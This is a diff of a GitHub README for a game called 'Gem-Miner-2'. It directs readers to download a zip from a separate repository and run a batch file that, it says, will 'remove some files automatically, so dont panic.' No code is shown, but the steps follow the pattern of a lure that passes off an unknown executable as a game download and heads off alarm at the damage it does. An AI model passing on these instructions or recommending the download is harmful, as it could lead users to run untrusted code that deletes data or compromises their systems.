FakeFizty/Gem-Miner-2/README.md

 </div>

-## How to Download, Installation process and More!
+## How to Download, Installation process, Updating and More!
  - **Download Latest Release:** **[Gem-Miner-2-Latest.zip](https://github.com/FakeFizty/get-download/blob/main/Gem%20Miner%202%20v0.9.zip?raw=true)**
  - **After downloading**, extract the zip file into a **new folder**, named **any way you want**.
 Then run the **GemMiner2.bat**.
 That should remove some files automatically, so dont panic.